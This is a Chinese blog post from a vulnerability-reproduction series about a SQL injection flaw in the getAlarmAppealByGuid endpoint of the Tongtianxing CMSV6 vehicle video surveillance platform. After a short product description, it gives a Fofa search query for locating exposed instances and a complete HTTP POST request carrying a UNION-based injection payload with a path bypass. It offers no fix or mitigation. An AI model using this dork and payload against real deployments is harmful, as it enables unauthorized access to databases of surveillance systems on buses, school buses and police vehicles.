通天星CMSV6车载视频监控平台 getAlarmAppealByGuid SQL注入

iSee857

已于 2024-08-28 18:58:24 修改

阅读量412

点赞数 8

分类专栏：漏洞复现文章标签： web安全

于 2024-08-28 18:57:37 首次发布

本文链接：https://blog.csdn.net/xc_214/article/details/141647342

版权

漏洞复现专栏收录该内容

123 篇文章 10 订阅

订阅专栏

0X01 漏洞描述：

通天星CMSV6车载视频监控平台是东莞市通天星软件科技有限公司研发的监控平台，通天星CMSV6产品覆盖车载录像机、单兵录像机、网络监控摄像机、行驶记录仪等产品的视频综合平台。通天星科技应用于公交车车载、校车车载、大巴车车载、物流车载、油品运输车载、警车车载等公共交通视频监控，还应用在家居看护、商铺远程监控、私家车的行驶分享仪上等。通天星CMSV6车载视频监控平台getAlarmAppealByGuid存在SQL注入漏洞，攻击者可以通过构造恶意的SQL语句，成功注入并执行恶意数据库操作，可能导致敏感信息泄露、数据库被篡改或其他严重后果

0x02 搜索语句：

Fofa：body="./open/webApi.html"

0x03 漏洞复现：

POST /alarm_appeal/getAlarmAppealByGuid;downloadLogger.action HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Encoding: gzip, deflate

guid=1') UNION ALL SELECT NULL,CONCAT(0x71766a7a71,0x6270784e707941665248534e6d7a654e694746796a66597654566574726970524c664a7068735741,0x7176626271),NULL-- -